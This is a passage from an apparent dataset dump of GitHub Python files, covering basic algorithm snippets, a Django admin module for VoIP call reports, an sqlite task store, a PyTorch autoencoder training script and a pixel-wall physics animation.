Comparing with first elements in both arrays.\r\n\r\n # » If the left side element is smaller than the right side element.\r\n if (L[i] < R[j]):\r\n\r\n # ◘ Replacing the first element in the main arrays with the smaller number.\r\n array[k] = L[i]\r\n i += 1\r\n \r\n # » If the Right side element is smaller than the left side element.\r\n else:\r\n array[k] = R[j]\r\n j += 1\r\n k += 1\r\n \r\n while i < len(L):\r\n array[k] = L[i]\r\n i += 1\r\n k += 1\r\n\r\n while j < len(R):\r\n array[k] = R[j]\r\n j += 1\r\n k += 1\r\n return array\r\n\r\n\r\n'''print(mergeSort([5,6,1,3,2,7,9,8,4]))'''\r\n\r\n\r\n\r\n\r\n\r\n\r\n#────────────────────────────────────important──────────────────────────────────────\r\n# α)\r\n# ▬▬ Check if a String contains an integer number:\r\n'''x = \"asdfas5654asd\"\r\n\r\nfor i in range(len(x)):\r\n try:\r\n if (isinstance(int(x[i]), int)):\r\n print(\"Integer\")\r\n except ValueError:\r\n print(\"Not Integer\")\r\n'''\r\n\r\n\r\n# ß)\r\n# ▬▬ Inverting string value.\r\n# ◘ Method_1\r\n'''print(string[::-1])'''\r\n\r\n# ◘ Method_2\r\n'''x = \"\"\r\ncount = len(string) -1\r\nfor i in string:\r\n x += string[count]\r\n count -= 1'''\r\n\r\n\r\n\r\n# Γ)\r\n# ▬▬ getting the absolute number from float value.\r\n'''if int(n) < n:\r\n print(int(n) + 1)\r\nelse:\r\n print(n)'''\r\n\r\n\r\n\r\n# Σ)\r\n# ▬▬ using enumerate function; Note that {enumerate} will print a type (list) in a form of dictionary {key and values}.\r\n'''lst = [\"GTX 1650\",\"GTX 980\",\"GTX 970\",\"RTX 2070\"]\r\nfor i,j in enumerate(lst):\r\n print(i,j)\r\n'''\r\n\r\n\r\n''' \r\n0 GTX 1650\r\n1 GTX 980\r\n2 GTX 970\r\n3 RTX 2070\r\n'''\r\n\r\n\r\n\r\n# σ)\r\n# ▬▬ using {.round()} function that is mainly used to get the nearest decimals according to the past argument.\r\n''' ◘ Note: that while the the parameter passed to this argument is <-number> » That will return the nearest 100 number.\r\n# ╚ For example: x = 5555.456156187 └ print(round(x,-2)) ▬ returns 5600'''\r\n\r\nx = -10\r\ny = 5\r\n#print(min(abs(y),abs(x)))\r\n\r\n\r\n\r\n# µ)\r\n# ▬▬ remove an item from a list and add it to an appended new list.\r\n'''\r\ndef remove_item(x):\r\n if x == 30:\r\n 
lst_1.reverse()\r\n lst.append(lst_1)\r\n return False\r\n if x > 30:\r\n lst.remove(x)\r\n lst_1.append(x)\r\n remove_item(x - 1)\r\n return lst\r\n'''\r\n\r\n\r\n\r\n# τ)\r\n# ▬▬ return a key for the specified value in dictionary.\r\n'''def get_required_item(item_1,item_2,item_3):\r\n dictionary = {\"GTX 1650\":item_1,\"RTX 2070\":item_2,\"RTX 3080\":item_3}\r\n for key,value in dictionary.items():\r\n if value:\r\n return key'''\r\n#───────────────────────────────────────────────────────────────────────────────────\r\n\r\n# Check your answer\r\n#q6.check()\r\n#print(exactly_one_topping(False,True,False))\r\n\r\n'''\r\nl = [1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17]\r\nlst = [x for x in l if x > 4]\r\nprint(lst)'''\r\n\r\n \r\ndic = {\"GTX 1650\":2900,\"GTX 2060\":5700,\"RTX 3080\":2900}\r\nx = 2900\r\n\r\n\r\n\r\n\r\n\r\n#print(remove_item(40))\r\n\r\n\r\n\r\n#print(lst)\r\n\r\n\r\n\r\n\r\n\r\n\r\n'''\r\ndef exactly_one_topping(ketchup, mustard, onion):\r\n \"\"\"Return whether the customer wants exactly one of the three available toppings\r\n on their hot dog.\r\n \"\"\"\r\n lst = []\r\n topping_dictionary = {\"Ketchup\":ketchup,\"Mustard\":mustard,\"Onion\":onion}\r\n for key, value in topping_dictionary.items():\r\n if value == True:\r\n lst.append(key)\r\n return lst\r\nprint(exactly_one_topping(True,True,False))\r\n'''\r\n\r\n\r\n\r\ndef select_second(L):\r\n \"\"\"Return the second element of the given list. If the list has no second\r\n element, return None.\r\n \"\"\"\r\n if len(L) > 2:\r\n return L[1]\r\n else:\r\n return None\r\n\r\n\r\n\r\n","repo_name":"Mustafa-pnevma-galinis/Basic-Algorithms","sub_path":"Agorithms.py","file_name":"Agorithms.py","file_ext":"py","file_size_in_byte":11412,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"29970770760","text":"from django.contrib import admin\nfrom django.contrib.admin.options import IncorrectLookupParameters\nfrom django.contrib.admin.views.main import ERROR_FLAG\nfrom django.conf.urls import patterns\nfrom django.conf import settings\nfrom django.core.urlresolvers import reverse\nfrom django.template import RequestContext\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.shortcuts import render_to_response\nfrom django.utils.translation import ugettext_lazy as _\nfrom django.utils.translation import ungettext\nfrom django.db.models import Sum, Avg, Count\nfrom dialer_cdr.models import Callrequest, VoIPCall\nfrom dialer_cdr.forms import AdminVoipSearchForm\nfrom dialer_cdr.function_def import voipcall_record_common_fun, voipcall_search_admin_form_fun\nfrom django_lets_go.common_functions import getvar\nfrom mod_utils.helper import Export_choice\nfrom genericadmin.admin import GenericAdminModelAdmin\nfrom datetime import datetime\nfrom django.utils.timezone import utc\nimport tablib\n\n\nAPP_LABEL = _('VoIP report')\n\n\nclass CallrequestAdmin(GenericAdminModelAdmin):\n\n \"\"\"\n Allows the administrator to view and modify certain attributes\n of a Callrequest.\n \"\"\"\n content_type_whitelist = ('survey/survey', )\n fieldsets = (\n (_('Standard options'), {\n 'fields': ('user', 'request_uuid', 'call_time', 'campaign',\n 'status', 'hangup_cause', 'callerid', 'phone_number',\n 'timeout', 'timelimit', 'call_type', 'aleg_gateway',\n 'content_type', 'object_id', ),\n }),\n (_('Advanced options'), {\n 'classes': ('collapse', ),\n 'fields': ('extra_data', 'extra_dial_string', 'subscriber', 'completed'),\n }),\n )\n # If we try to display user / 
content_type low the performance\n list_display = ('id', 'request_uuid', 'aleg_uuid', 'call_time',\n 'status', 'callerid', 'phone_number', 'call_type',\n 'completed', 'num_attempt', 'last_attempt_time', )\n raw_id_fields = ('subscriber',)\n list_display_links = ('id', 'request_uuid', )\n list_filter = ['callerid', 'call_time', 'status', 'call_type', 'campaign']\n ordering = ('-id', )\n search_fields = ('request_uuid', )\n\nadmin.site.register(Callrequest, CallrequestAdmin)\n\n\nclass VoIPCallAdmin(admin.ModelAdmin):\n\n \"\"\"\n Allows the administrator to view and modify certain attributes\n of a VoIPCall.\n \"\"\"\n can_add = False\n detail_title = _(\"Call Report\")\n list_display = ('id', 'leg_type', 'callid', 'callerid', 'phone_number',\n 'starting_date', 'min_duration', 'billsec', 'disposition',\n 'hangup_cause', 'callrequest')\n valid_lookups = ('callrequest__campaign_id', )\n raw_id_fields = ('callrequest', )\n if settings.AMD:\n list_display += ('amd_status', )\n ordering = ('-id', )\n\n def lookup_allowed(self, lookup, *args, **kwargs):\n if lookup.startswith(self.valid_lookups):\n return True\n return super(VoIPCallAdmin, self).lookup_allowed(lookup, *args, **kwargs)\n\n def user_link(self, obj):\n \"\"\"User link to user profile\"\"\"\n if obj.user.is_staff:\n url = reverse('admin:auth_staff_change', args=(obj.user_id, ))\n else:\n url = reverse('admin:auth_customer_change', args=(obj.user_id, ))\n return '%s' % (url, obj.user)\n user_link.allow_tags = True\n user_link.short_description = _('User')\n\n def used_gateway_link(self, obj):\n \"\"\"Used gateway link to edit gateway detail\"\"\"\n if obj.used_gateway:\n url = reverse('admin:dialer_gateway_gateway_change', args=(obj.used_gateway.id, ))\n return '%s' % (url, obj.used_gateway)\n used_gateway_link.allow_tags = True\n used_gateway_link.short_description = _('Gateway used')\n\n def has_add_permission(self, request):\n \"\"\"Remove add permission on VoIP Call Report model\n\n **Logic Description**:\n\n * Override django admin has_add_permission method to remove add\n permission on VoIP Call Report model\n \"\"\"\n if not self.can_add:\n return False\n return super(VoIPCallAdmin, self).has_add_permission(request)\n\n def get_urls(self):\n urls = super(VoIPCallAdmin, self).get_urls()\n my_urls = patterns('',\n (r'^$', self.admin_site.admin_view(self.changelist_view)),\n (r'^voip_daily_report/$', self.admin_site.admin_view(self.voip_daily_report)),\n (r'^export_voip_report/$', self.admin_site.admin_view(self.export_voip_report)),\n )\n return my_urls + urls\n\n def changelist_view(self, request, extra_context=None):\n \"\"\"\n Override changelist_view method of django-admin for search parameters\n\n **Attributes**:\n\n * ``form`` - AdminVoipSearchForm\n * ``template`` - admin/dialer_cdr/voipcall/change_list.html\n\n **Logic Description**:\n\n * VoIP report Record Listing with search option & Daily Call Report\n search Parameters: by date, by status and by billed.\n \"\"\"\n opts = VoIPCall._meta\n query_string = ''\n form = AdminVoipSearchForm()\n if request.method == 'POST':\n # Session variable get record set with searched option into export file\n request.session['admin_voipcall_record_kwargs'] = voipcall_record_common_fun(request)\n\n query_string = voipcall_search_admin_form_fun(request)\n return HttpResponseRedirect(\"/admin/%s/%s/?%s\" % (opts.app_label, opts.object_name.lower(), query_string))\n else:\n disposition = ''\n from_date = ''\n to_date = ''\n campaign_id = ''\n leg_type = ''\n\n from_date = getvar(request, 
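'starting_date__gte')\n            # Assumption, not original commentary: getvar() (imported from\n            # django_lets_go.common_functions) appears to fetch a request\n            # parameter with an empty default, and the [0:10] slice below\n            # trims a timestamp down to its YYYY-MM-DD prefix.\n            from_date = getvar(request, 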
'starting_date__gte')\n to_date = getvar(request, 'starting_date__lte')[0:10]\n disposition = getvar(request, 'disposition__exact')\n campaign_id = getvar(request, 'callrequest__campaign_id')\n leg_type = getvar(request, 'leg_type__exact')\n\n form = AdminVoipSearchForm(initial={'disposition': disposition,\n 'from_date': from_date,\n 'to_date': to_date,\n 'campaign_id': campaign_id,\n 'leg_type': leg_type})\n\n ChangeList = self.get_changelist(request)\n try:\n cl = ChangeList(request, self.model, self.list_display,\n self.list_display_links, self.list_filter, self.date_hierarchy,\n self.search_fields, self.list_select_related,\n self.list_per_page, self.list_max_show_all, self.list_editable,\n self)\n except IncorrectLookupParameters:\n if ERROR_FLAG in request.GET.keys():\n return render_to_response('admin/invalid_setup.html', {'title': _('Database error')})\n return HttpResponseRedirect('%s?%s=1' % (request.path, ERROR_FLAG))\n\n if request.META['QUERY_STRING'] == '':\n # Default\n # Session variable get record set with searched option into export file\n request.session['admin_voipcall_record_kwargs'] = voipcall_record_common_fun(request)\n\n query_string = voipcall_search_admin_form_fun(request)\n return HttpResponseRedirect(\"/admin/%s/%s/?%s\" % (opts.app_label, opts.object_name.lower(), query_string))\n\n cl.formset = None\n\n selection_note_all = ungettext('%(total_count)s selected', 'All %(total_count)s selected', cl.result_count)\n\n ctx = {\n 'selection_note': _('0 of %(cnt)s selected') % {'cnt': len(cl.result_list)},\n 'selection_note_all': selection_note_all % {'total_count': cl.result_count},\n 'cl': cl,\n 'form': form,\n 'opts': opts,\n 'model_name': opts.object_name.lower(),\n 'app_label': APP_LABEL,\n 'title': _('call report'),\n }\n return super(VoIPCallAdmin, self).changelist_view(request, extra_context=ctx)\n\n def voip_daily_report(self, request):\n opts = VoIPCall._meta\n kwargs = {}\n if request.method == 'POST':\n form = AdminVoipSearchForm(request.POST)\n kwargs = voipcall_record_common_fun(request)\n else:\n kwargs = voipcall_record_common_fun(request)\n tday = datetime.today()\n form = AdminVoipSearchForm(initial={\"from_date\": tday.strftime(\"%Y-%m-%d\"),\n \"to_date\": tday.strftime(\"%Y-%m-%d\")})\n if len(kwargs) == 0:\n kwargs['starting_date__gte'] = datetime(tday.year, tday.month, tday.day,\n 0, 0, 0, 0).replace(tzinfo=utc)\n\n select_data = {\"starting_date\": \"SUBSTR(CAST(starting_date as CHAR(30)),1,10)\"}\n # Get Total Records from VoIPCall Report table for Daily Call Report\n total_data = VoIPCall.objects.extra(select=select_data).values('starting_date').filter(**kwargs)\\\n .annotate(Count('starting_date'))\\\n .annotate(Sum('duration'))\\\n .annotate(Avg('duration'))\\\n .order_by('-starting_date')\n\n # Following code will count total voip calls, duration\n if total_data:\n max_duration = max([x['duration__sum'] for x in total_data])\n total_duration = sum([x['duration__sum'] for x in total_data])\n total_calls = sum([x['starting_date__count'] for x in total_data])\n total_avg_duration = (sum([x['duration__avg'] for x in total_data])) / total_calls\n else:\n max_duration = 0\n total_duration = 0\n total_calls = 0\n total_avg_duration = 0\n\n ctx = RequestContext(request, {\n 'form': form,\n 'total_data': total_data,\n 'total_duration': total_duration,\n 'total_calls': total_calls,\n 'total_avg_duration': total_avg_duration,\n 'max_duration': max_duration,\n 'opts': opts,\n 'model_name': opts.object_name.lower(),\n 'app_label': APP_LABEL,\n 
'title': _('call aggregate report'),\n        })\n        return render_to_response('admin/dialer_cdr/voipcall/voip_report.html', context_instance=ctx)\n\n    def export_voip_report(self, request):\n        \"\"\"Export a CSV file of VoIP call records\n\n        **Important variable**:\n\n            * request.session['admin_voipcall_record_kwargs'] - stores voipcall kwargs\n\n        **Exported fields**: [user, callid, callerid, phone_number,\n                              starting_date, duration, disposition,\n                              used_gateway]\n        \"\"\"\n        # get the response object, this can be used as a stream.\n        format_type = request.GET['format']\n        response = HttpResponse(content_type='text/%s' % format_type)\n        # force download.\n        response['Content-Disposition'] = 'attachment;filename=export.%s' % format_type\n\n        # super(VoIPCall_ReportAdmin, self).queryset(request)\n        kwargs = request.session['admin_voipcall_record_kwargs']\n        qs = VoIPCall.objects.filter(**kwargs)\n\n        amd_status = ''\n        if settings.AMD:\n            amd_status = 'amd_status'\n\n        headers = ('user', 'callid', 'callerid', 'phone_number', 'starting_date', 'duration',\n                   'billsec', 'disposition', 'used_gateway', amd_status)\n\n        list_val = []\n        for i in qs:\n            gateway_used = i.used_gateway.name if i.used_gateway else ''\n            amd_status = i.amd_status if settings.AMD else ''\n\n            starting_date = i.starting_date\n            if format_type == Export_choice.JSON or format_type == Export_choice.XLS:\n                starting_date = str(i.starting_date)\n\n            list_val.append((i.user.username,\n                             i.callid,\n                             i.callerid,\n                             i.phone_number,\n                             starting_date,\n                             i.duration,\n                             i.billsec,\n                             i.disposition,\n                             gateway_used,\n                             amd_status))\n\n        data = tablib.Dataset(*list_val, headers=headers)\n\n        if format_type == Export_choice.XLS:\n            response.write(data.xls)\n        elif format_type == Export_choice.CSV:\n            response.write(data.csv)\n        elif format_type == Export_choice.JSON:\n            response.write(data.json)\n\n        return response\n\nadmin.site.register(VoIPCall, VoIPCallAdmin)\n","repo_name":"newfies-dialer/newfies-dialer","sub_path":"newfies/dialer_cdr/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":12938,"program_lang":"python","lang":"en","doc_type":"code","stars":159,"dataset":"github-code","pt":"50"} +{"seq_id":"9843364968","text":"import sqlite3\r\nimport sys\r\nimport os.path as Path\r\nconn = sqlite3.connect('base.db')\r\ncur = conn.cursor()\r\n\r\n\r\nSQL_SELECT_ALL = '''\r\n    SELECT\r\n        id, task, status\r\n    FROM\r\n        base\r\n'''\r\n\r\nSQL_SELECT_TASK_BY_ID = SQL_SELECT_ALL + ' WHERE id = ?'\r\n\r\nSQL_INSERT_ADD_TASK = '''\r\n    INSERT INTO base (task, status)\r\n    VALUES (?, ?)\r\n'''\r\n\r\nSQL_EDIT_TASK = '''\r\n    UPDATE base \r\n    SET task = ?, status = ?\r\n    WHERE ID = ?\r\n'''\r\n\r\nSQL_COMPLITE_TASK = '''\r\n    UPDATE base \r\n    SET status = 'Задача выполнена'\r\n    WHERE ID = ?\r\n    '''\r\n\r\nSQL_RESTART_TASK = '''\r\n    UPDATE base \r\n    SET status = 'Задача вернулась в работу'\r\n    WHERE ID = ?\r\n'''\r\n\r\ndef dict_factory(cursor, row):\r\n    d = {}\r\n    print('row:', row)\r\n    print('col:', cursor.description)\r\n    for idx, col in enumerate(cursor.description):\r\n        d[col[0]] = row[idx] \r\n    return d\r\n\r\n\r\ndef connect (db_name=None):\r\n    if db_name is None:\r\n        db_name = ':memory:'\r\n\r\n    conn = sqlite3.connect(db_name)\r\n    conn.row_factory = dict_factory\r\n\r\n    return conn\r\n\r\n\r\ndef initialize(conn):\r\n    with conn:\r\n        script_file_path = Path.join(Path.dirname(__file__), 'shema.sql')\r\n        with open (script_file_path) as f:\r\n            conn.executescript(f.read())\r\n\r\ndef find_all(conn):\r\n    with conn:\r\n        cur = conn.execute(SQL_SELECT_ALL)\r\n        return cur.fetchall()\r\n\r\n\r\ndef list_task(conn):\r\n    with conn:\r\n        cur = conn.execute(SQL_SELECT_ALL)\r\n        return cur.fetchall()\r\n\r\n\r\ndef add_task(conn, task, status):\r\n    with conn:\r\n        cur = conn.execute(SQL_INSERT_ADD_TASK, (task, status))\r\n\r\n\r\ndef edit_task(conn, id, task, status):\r\n    with conn:\r\n        cur = conn.execute(SQL_EDIT_TASK, (task, status, id))\r\n\r\n\r\ndef complite_task(conn, id):\r\n    with conn:\r\n        cur = conn.execute(SQL_COMPLITE_TASK, (id,))\r\n\r\n    \r\ndef restart_task(conn, id):\r\n    with conn:\r\n        cur = conn.execute(SQL_RESTART_TASK, (id,)) \r\n\r\n\r\ndef exit():\r\n    sys.exit(0) \r\n\r\n\r\ndef check(conn, id):\r\n    with conn:\r\n        cursor = conn.execute(SQL_SELECT_TASK_BY_ID, (id,))","repo_name":"malyshevan/proga","sub_path":"storage.py","file_name":"storage.py","file_ext":"py","file_size_in_byte":2127,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"74985787996","text":"import torch\nimport dataloader\nimport argparse\nimport torchvision\nimport model\nfrom torch.autograd import Variable\nimport torch.nn.functional as F\nimport torch.nn as nn\nimport gc\nimport itertools\nimport time\n\nimport numpy as np\nfrom skimage import data\nfrom skimage.filters import threshold_otsu\nfrom skimage.segmentation import clear_border\nfrom skimage.measure import label, regionprops\nfrom skimage.morphology import closing, square\nfrom skimage.color import label2rgb\nfrom skimage.morphology import watershed\nimport torchvision.transforms as transforms\n\nimport sklearn\nimport sklearn.decomposition\nimport random\nimport torchvision.models as models\nimport cv2\nimport multiprocessing\n\n#from apex import amp\n#amp_handle = amp.init()\n\ntorch.backends.cudnn.benchmark = True\n\nparser = argparse.ArgumentParser(description='')\n\nparser.add_argument('--dataroota', default=[\n\t'/home/lolz0r/domain/data/billted/',\n\t'/home/lolz0r/domain/data/lifeofpi/',\n\t'/home/lolz0r/coco2017/train2017/'\n\t], type=str)\n\nparser.add_argument('--nthread', default=3, type=int)\n\nparser.add_argument('--loadSize', default=600, type=int)\nparser.add_argument('--imgSize', default=512, type=int)\nparser.add_argument('--batchSize', default=12, type=int)\nparser.add_argument('--itersPerEpoch', default=10000, type=int)\n\nparser.add_argument('--encoderStep', default=64, type=int)\nparser.add_argument('--levels', default=1, type=int)\n\nopt = parser.parse_args()\n\ntrainDataset = torch.utils.data.DataLoader(dataloader.ABDataloader(opt), \n\tshuffle=True, batch_size=opt.batchSize, num_workers=opt.nthread, pin_memory=True)\nautoEncoder = model.UNet(opt).cuda()\nnetGStateDict = autoEncoder.state_dict()\n\nloadedSD = torch.load('./saves/autoEncoder--3.983832822715064.pth')\nfor k in netGStateDict.keys():\n\tprint(k)\n\tif k in loadedSD and netGStateDict[k].size() == loadedSD[k].size():\n\t\tnetGStateDict[k] = loadedSD[k]\n\t\tprint('... 
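shape match, copying')\n\t\t# Note (assumption about intent, not original commentary): this is the\n\t\t# usual partial-checkpoint pattern -- only keys present in the saved\n\t\t# state with matching tensor shapes are copied, so any newly added\n\t\t# layers keep their fresh initialisation.\n\t\tprint('... 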
copied')\nautoEncoder.load_state_dict(netGStateDict )\n\nautoEncoder.cuda()\n\n#autoEncoder.load_state_dict(torch.load('/home/lolz0r/domain/linesToImg/saves/autoEncoder-0.12010071901894874.pth'))\n#autoEncoder.load_state_dict(torch.load('/home/lolz0r/domain/linesToImg/saves/autoEncoder-0.8203608310765785.pth'))\n#autoEncoder = torch.nn.DataParallel(autoEncoder, device_ids=[0, 1])\n\n#optimizerEnc = YFOptimizer(encoder.parameters())\n#optimizer = YFOptimizer(autoEncoder.parameters())\n#optimizerDecB = YFOptimizer(decoderB.parameters())\n \n#optimizer = torch.optim.SGD(autoEncoder.parameters(), lr=0.0005, momentum=0.9, nesterov=True)\noptimizer = torch.optim.Adam(autoEncoder.parameters(), lr=0.001, amsgrad=True )\n\nitercount = 0\nevalFirst = False\n\n\ndef pearsonr(x, y):\n\tmean_x = torch.mean(x)\n\tmean_y = torch.mean(y)\n\txm = x.sub(mean_x)\n\tym = y.sub(mean_y)\n\tr_num = xm.dot(ym)\n\tr_den = torch.norm(xm, 2) * torch.norm(ym, 2)\n\tr_val = r_num / r_den\n\treturn r_val\n\nclass NetPerLayer(nn.Module):\n\tdef __init__(self):\n\t\tsuper(NetPerLayer, self).__init__()\n\n\t\tnet = torchvision.models.resnet18(pretrained=True)\n\t\tnet.eval()\n\n\t\tself.nodeLevels = nn.ModuleList()\n\t\tself.nodeLevels.append(nn.Sequential(net.conv1, net.bn1, net.relu, net.maxpool))\n\t\tself.nodeLevels.append(net.layer1)\n\t\tself.nodeLevels.append(net.layer2)\n\t\tself.nodeLevels.append(net.layer3)\n\t\tself.nodeLevels.append(net.layer4)\n\t\t#self.nodeLevels.append(nn.MaxPool2d(8))\n\n\t\t\n\tdef forward(self, input):\n\t\tactivations = []\n\n\t\tx = input\n\t\tfor m in self.nodeLevels:\n\t\t\tx = m(x)\n\t\t\tactivations.append(x)\n\n\t\treturn activations\n\nsqueezeNet = NetPerLayer()\nsqueezeNet = squeezeNet.cuda()\n#squeezeNet = torch.nn.DataParallel(squeezeNet, device_ids=[0, 1])\nsqueezeNet.eval()\n\ndef runDatasetIteration(dataset, isEval, itercount):\n\n\tepochTotalLoss = 0.0\n\tepochIterationCount = 0.0\n\tprint('epoch start')\n\trepeatCount = 4\n\n\tmeanToStart =5\n\tmeanWeights = (np.linspace(0.0, 1.0, num=meanToStart+2)**2 )\n\tmeanWeights = meanWeights[1:]\n\tlastNWeights = []\n\n\tfor imgInput, imgTarget in dataset:\n\t\tfor repeat in range(2):\n\t\n\t\t\t#print(torch.max(inputA))\n\t\t\t#torchvision.utils.save_image(imgInput, 'a.png', nrow=8, padding=2, normalize=True)\n\t\t\t#torchvision.utils.save_image(imgTarget, 'adist.png', nrow=8, padding=2, normalize=True)\n\t\t\t#quit()\n\n\t\t\toptimizer.zero_grad()\n\n\t\t\timg = Variable(imgInput.cuda())\n\t\t\timgTarget = Variable(imgTarget.cuda())\n\n\t\t\ttimeModelStart = time.time()\t\n\t\t\t\n\t\t\timgOutput = autoEncoder(img)\n\n\t\t\tactivationsTarget = squeezeNet(imgTarget)\n\t\t\tactivationsOutput = squeezeNet(imgOutput)\n\n\t\t\tfeatLoss = None\n\t\t\t#for actTarget, actOutput in zip(activationsTarget[1:3], activationsOutput[1:3]):\n\t\t\tfor actTarget, actOutput in zip(activationsTarget, activationsOutput):\n\t\t\t\t#l = F.mse_loss(actTarget, actOutput)\n\t\t\t\t#l = torch.abs(actTarget - actOutput).sum()\n\t\t\t\t#l = F.l1_loss(actTarget, actOutput)\n\n\t\t\t\tl = -pearsonr(actTarget.view(-1), actOutput.view(-1))\n\t\t\t\tif featLoss is None:\n\t\t\t\t\tfeatLoss = l\n\t\t\t\telse:\n\t\t\t\t\tfeatLoss += l\n\t\t\t'''\n\t\t\tgradOutput = imgOutput[:,:, :-1,:-1] - imgOutput[:,:, 1:,1:]\n\t\t\tgradTarget = imgTarget[:,:, :-1,:-1] - imgTarget[:,:, 1:,1:]\n\t\t\tfeatLoss = F.l1_loss(gradOutput, gradTarget)\n\t\t\t'''\n\t\t\tpixelLoss = F.mse_loss(imgOutput, imgTarget )\n\t\t\tloss = featLoss +pixelLoss#+(pixelLoss*1)# + lossMSSIM# + 
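reg_loss (terms after the first '#' stay disabled)\n\t\t\t# Note (assumption, not original commentary): featLoss is a negative\n\t\t\t# Pearson correlation over ResNet-18 feature maps, so minimising it\n\t\t\t# drives the correlation toward +1, while the pixel MSE term anchors\n\t\t\t# low-frequency content.\n\t\t\t# + 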
reg_loss\n\t\t\t\n\t\t\t#loss = featLoss\n\t\t\t#loss.backward()\n\n\t\t\t#torch.nn.utils.clip_grad_norm_(autoEncoder.parameters(), 1)\n\n\t\t\tepochTotalLoss += loss.item()\n\n\t\t\ttimeModelEnd = time.time()\n\n\t\t\tprefix = ''\n\t\t\t#isEval = True\n\t\t\tif isEval:\n\t\t\t\t# swap encoders\n\t\t\t\tprefix = 'EVAL: '\n\t\t\telse:\t\n\t\t\t\tloss.backward()\n\t\t\t\t#print(loss)\n\t\t\t\t#with amp_handle.scale_loss(loss, optimizer) as scaled_loss:\n\t\t\t\t#\tscaled_loss.backward()\n\t\t\t\toptimizer.step()\n\t\t\t\n\t\t\tweights = autoEncoder.extract_parameters()\n\t\t\tlastNWeights.append(weights)\n\t\t\tif len(lastNWeights) > meanToStart:\n\t\t\t\tmeanTeacher = np.array(lastNWeights)\n\t\t\t\tmeanTeacher = np.average(meanTeacher, axis=0, weights=meanWeights).astype(np.float32)\n\t\t\t\tautoEncoder.inject_parameters(meanTeacher)\n\t\t\t\tdel lastNWeights[0]\n\t\t\t\t\n\t\t\t#print(\"{} {}: total loss: {:.4f} feat: {:.4f} model-time: {}\".format(prefix, \n\t\t\tprint(\"{} {} {}: total loss: {:.4f} (feat: {:.4f} pixel: {:.4f}) ... model-time: {:.2f}\".format(prefix, \n\t\t\t\titercount, \n\t\t\t\trepeat,\n\t\t\t\tloss.item(), \n\t\t\t\tfeatLoss.item(),\n\t\t\t\tpixelLoss.item(),\n\t\t\t\ttimeModelEnd-timeModelStart))\n\n\t\t\titercount = itercount + 1\n\t\t\tepochIterationCount = epochIterationCount + 1\n\n\t\t\tif itercount == 1 or itercount % 100 == 0:\n\n\t\t\t\t#renderedImg = imgOutput.data.cpu()\n\t\t\t\t#renderedImg[imgInput != -1] = imgInput[imgInput != -1]\n\t\t\t\t#torchvision.utils.save_image(renderedImg.data.cpu(), './images/output-{}.png'.format(itercount), nrow=8, padding=2, normalize=True)\n\n\t\t\t\toutputTensor = torch.Tensor( imgOutput.size(0) * 3,\n\t\t\t\t\timgOutput.size(1),\n\t\t\t\t\timgOutput.size(2),\n\t\t\t\t\timgOutput.size(3))\n\n\t\t\t\tb = 0\n\t\t\t\tfor i in range(0, outputTensor.size(0), 3):\n\t\t\t\t\toutputTensor[i] = imgInput[b].data.cpu()\n\t\t\t\t\toutputTensor[i+1] = imgOutput[b].data.cpu()\n\t\t\t\t\toutputTensor[i+2] = imgTarget[b].data.cpu()\n\t\t\t\t\tb += 1\n\t\t\t\t\n\t\t\t\ttorchvision.utils.save_image(outputTensor.data.cpu(), './images/output-{}.png'.format(itercount), nrow=3, padding=2, normalize=True)\n\t\t\n\tavgEpochLoss = epochTotalLoss / epochIterationCount\n\treturn avgEpochLoss, itercount\n\nwhile True:\n\tif evalFirst == False:\n\t\tprint('starting epoch:')\n\t\ttrainEpochLoss, itercount = runDatasetIteration(trainDataset, False, itercount)\n\n\t\tprint('****** TRAINING EPOCH COMPLETE ... epoch loss: {} ******'.format(trainEpochLoss))\n\n\t#encoder.eval()\n\t#testEpochLoss, itercount = runDatasetIteration(trainDataset, True, itercount)\n\t#evalFirst = False\n\n\t#print('****** TESTING EPOCH COMPLETE ... epoch loss: {} ******'.format(testEpochLoss))\n\t#torch.save(model.state_dict(), './saves/mask-dist-eval-{}.pth'.format(testEpochLoss))\n\n\tprint('saving models')\n\t#torch.save(autoEncoder.module.state_dict(), './saves/autoEncoder-{}.pth'.format(trainEpochLoss))\n\ttorch.save(autoEncoder.state_dict(), './saves/autoEncoder-{}.pth'.format(trainEpochLoss))\n\tprint('... 
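checkpoint written')\n\t# Note (assumption): the epoch loss is embedded in the filename, so each\n\t# epoch leaves its own snapshot instead of overwriting a single file.\n\tprint('... 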
save complete!')\n\t#torch.save(autoEncoder.state_dict(), './saves/autoEncoder-{}.pth'.format(trainEpochLoss))\n\n","repo_name":"lolz0r/ganless-hd","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":8055,"program_lang":"python","lang":"en","doc_type":"code","stars":41,"dataset":"github-code","pt":"50"} +{"seq_id":"71587832474","text":"import sys\nimport random\nimport math\nimport operator\nsys.path.append('.\\PixelWall')\nfrom PixelWall import Frame,Drawing,PresetAnimations\nfrom PIL import Image, ImageDraw, ImageFilter\n\nclass ForcesOfPhysics(PresetAnimations.AnimationInstance):\n\tdef extendedInit(self):\n\t\tself.model = PH_environment()\n\t\tself.steps = 0\n\n\tdef Render(self):\n\t\tif self.steps == 0:\n\t\t\tmyP1 = PH_Particle(position = (8,00),acceleration = (0,1),mass = 200000,color = (255,0,0))\n\t\t\tmyP2 = PH_Particle(position = (10,00),acceleration = (0,0.03),mass = 2000,color = (0,0,255))\n\t\t\tself.model.addParticle(myP1)\n\t\t\tself.model.addParticle(myP2)\n\t\t\tself.model.addParticle(PH_Particle(position = (10,10),mass = 50000,color = (0,255,0),mergable = False,fixed = True))\n\t\t\tself.model.addParticle(PH_Particle(position = (15,15),mass = 500000,color = (0,255,0),mergable = True,fixed = True))\n\t\t\tself.model.addParticle(PH_Particle(position = (15,7),mass = 5000,color = (0,255,255),mergable = True,fixed = False))\n\t\telse:\n\t\t\tself.model.simulate()\n\t\tpoints = self.model.dotList()\n\t\tself.steps +=1\n\t\tfor i in points:\n\t\t\tif int(i[0][0]) < 0 or int(i[0][0]) > 27 or int(i[0][1]) <0 or int(i[0][1]) > 27:\n\t\t\t\tpass\n\t\t\telse:\n\t\t\t\tself.dFrame.pixel[int(i[0][0]),int(i[0][1])] = i[2]\nclass PH_ForceField():\n\tdef __init__(self,mass = 1,position = (0,0),particle = None):\n\t\tself.particle = particle\n\n\tdef 